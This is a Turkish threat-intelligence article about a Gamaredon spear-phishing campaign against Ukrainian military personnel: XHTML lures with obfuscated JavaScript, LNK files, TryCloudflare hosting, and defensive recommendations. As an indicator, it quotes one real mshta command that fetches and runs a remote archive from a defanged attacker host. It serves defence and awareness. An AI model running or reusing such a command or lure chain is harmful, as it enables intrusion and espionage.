Gamaredon APT grubu tarafından düzenlenen karmaşık bir mızraklı kimlik avı kampanyası, Ukraynalı askeri personel için bir tehdit olarak ortaya çıktı. Cyble Research and Intelligence Labs (CRIL), hassas askeri sistemleri tehlikeye atmak için mızraklı kimlik avı e-postalarından yararlanan bu kapsamlı operasyonu ortaya çıkardı.
Gamaredon, Primitive Bear veya Armageddon olarak da bilinir, Ukrayna hükümet kurumlarını ve kritik altyapılarını hedef alma konusunda uzun bir geçmişe sahip, Rusya’ya bağlı bir Gelişmiş Sürekli Tehdit (APT) grubudur. En az 2013’ten beri aktif olan Gamaredon, siber casusluk faaliyetleriyle kötü bir üne sahiptir. Araçları nispeten düşük karmaşıklığa rağmen, grubun belirli jeopolitik hedeflere ısrarla odaklanması çok sayıda başarılı saldırıya yol açmıştır.
Gamaredon Harekatı’na Genel Bakış
Gamaredon’un son kampanyası, taktiklerinde ve kapsamında bir tırmanışı yansıtıyor. CRIL’in son analizi, grubun Ukraynalı askeri personele yönelik kötü amaçlı yükler göndermek için hedefli kimlik avı e-postaları kullandığını ortaya koyuyor. Bu kampanya, zararlı içerikleri dağıtmak için hedefli kimlik avı e-postalarından yararlanıyor ve koordineli ve büyük ölçekli siber saldırıların açık bir örüntüsünü gösteriyor.
Bu Gamaredon kampanyasının merkezindeki mızraklı kimlik avı e-postaları, alıcıları kötü amaçlı dosyaları yürütmeye kandırmak için tasarlanmıştır. E-postalar, “ПОВІСТКА” (yani “çağrı” anlamına gelir) gibi konularla askeri çağrılar etrafında temalıdır. Her e-posta, açıldığında bir dizi zararlı eylem başlatmak üzere tasarlanmış kötü amaçlı bir XHTML eki içerir.
Etkinleştirme üzerine, XHTML dosyası gizlenmiş JavaScript kodunu yürütür. Kimliği “jwu” olarak ayarlanmış bir div öğesinin içinde gizlenen bu betik, gerçek amacını gizlemek için Base64 kodlaması ve rastgele karakterler kullanır. Gizleme, güvenlik sistemleri tarafından tespit edilmekten kaçınmak için kasıtlı bir taktiktir. JavaScript kodu sessizce çalışır ve kurbanın İndirmeler dizinine RAR sıkıştırılmış bir klasör indirir. Bu klasör, meşru bir dosya gibi görünmek ve kullanıcıyı daha da kandırmak için tasarlanmıştır.
İndirilen RAR dosyası bir Windows kısayolu (LNK) dosyası içerir. Bu kısayol yürütüldüğünde, uzak bir .tar arşivinin çalıştırılmasını başlatır. Gamaredon grubu, bu kötü amaçlı dosyaları barındırmak için TryCloudflare’in tek seferlik tünel özelliğini kullanmıştır. Saldırganlar, TryCloudflare’i kullanarak, geleneksel tespit yöntemleri olmadan kaynaklara erişmek ve yüklerini dağıtmak için geçici, anonim bir tünel kullanabilirler.
LNK dosyası tarafından yürütülen özel komut şudur:
- “C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f”
Bu komut, sistemin TryCloudflare etki alanından kötü amaçlı .tar dosyasını almasını ve çalıştırmasını yönlendirir.
Gamaredon Kampanyasının Ölçeği ve Etkisi
Devam eden Gamaredon kampanyası, büyük ölçekli ve karmaşık uygulamasıyla dikkat çekiyor. Mızraklı kimlik avı e-postalarının sıklığı ve hacmi, son derece koordineli bir çabayı gösteriyor. TryCloudflare’in tek seferlik tünel özelliğinin kullanımı, grubun geleneksel siber güvenlik önlemlerini aşmadaki yaratıcılığını vurguluyor.
Bu kampanyanın temel bir bileşeni, kötü amaçlı dosyaların içine 1 piksellik uzak bir görüntünün eklenmesidir. Bu görüntü, saldırganların kimlik avı içerikleriyle etkileşimleri izlemelerine ve saldırılarının etkinliğini ölçmelerine olanak tanıyan bir izleme mekanizması görevi görür.
CRIL’in soruşturması .tar dosyalarının içeriğine ulaşamamış olsa da Cisco Talos gibi diğer siber güvenlik uzmanlarının analizleri, bu arşivlerin muhtemelen tehlikeye atılmış sistemlerden hassas bilgileri sızdırmak için tasarlanmış ek kötü amaçlı yükler içerdiğini öne sürüyor.
Siber Güvenlik İçin Sonuçlar ve Öneriler
Özellikle askeriye gibi hassas sektörlerde faaliyet gösteren kuruluşların, karmaşık hedefli kimlik avı saldırılarını engellemek için kapsamlı siber güvenlik stratejileri benimsemeleri gerekiyor.
Öncelikle, kullanıcı eğitimi esastır. Kullanıcıları, özellikle beklenmedik askeri temalı ekler veya mesajlar içeren spear-phishing girişimlerini nasıl tanıyacakları konusunda eğitmek hayati önem taşır. Farkındalık, bu tür saldırıların başarı oranını azaltmada önemli bir rol oynar.
Gelişmiş e-posta güvenliği bir diğer kritik bileşendir. Gelişmiş tehdit koruma yeteneklerine sahip e-posta güvenliği çözümlerinin uygulanması, kimlik avı e-postalarını ve kötü amaçlı ekleri etkili bir şekilde filtrelemeye yardımcı olur.
Ek olarak, sağlam anti-malware çözümlerinin dağıtılması gereklidir. Bu araçlar, gizlenmiş JavaScript kodunu ve kötü amaçlı LNK dosyalarını tespit edip engelleyebilmelidir. Çevrimiçi tehditlere karşı korumayı sürdürmek için düzenli güncellemeler ve taramalar esastır.
Ağ izleme de hayati önem taşır. TryCloudflare’in tek seferlik tünellerine veya diğer bilinmeyen dış kaynaklara bağlantılar gibi olağandışı ağ etkinliklerine dikkat etmek, daha fazla sızmayı önleyebilecek anormalliklerin erken tespitine yardımcı olur.
Uygulama beyaz listesi, yalnızca güvenilir uygulamaların ve betiklerin sistemlerde çalışmasına izin vermek için kullanılmalıdır. Bu önlem, potansiyel olarak zararlı dosyaların yetkisiz yürütülmesini önlemeye yardımcı olur.
Son olarak, tehdit istihbarat platformlarından yararlanmak, Gamaredon gibi gruplar tarafından kötüye kullanılanlar da dahil olmak üzere bilinen kötü amaçlı etki alanlarını engellemek için önemlidir. En son tehdit istihbaratıyla güncel kalmak, siber saldırılara karşı önleyici bir şekilde mücadele etmede bir avantaj sağlar.
Gamaredon kampanyası, Ukraynalı askeri personeli hedef alan siber tehditlerde önemli bir artışı temsil ediyor. Gamaredon, hedefli kimlik avı e-postaları, kötü amaçlı XHTML ekleri ve TryCloudflare’in tek seferlik tünel özelliği gibi gelişmiş kaçınma tekniklerinin kullanımıyla saldırılarını iyileştirmeye ve yoğunlaştırmaya devam ediyor. Bu kampanyanın sürekliliği ve ölçeği, dikkatli ve proaktif siber güvenlik önlemlerini sürdürmenin önemini vurguluyor.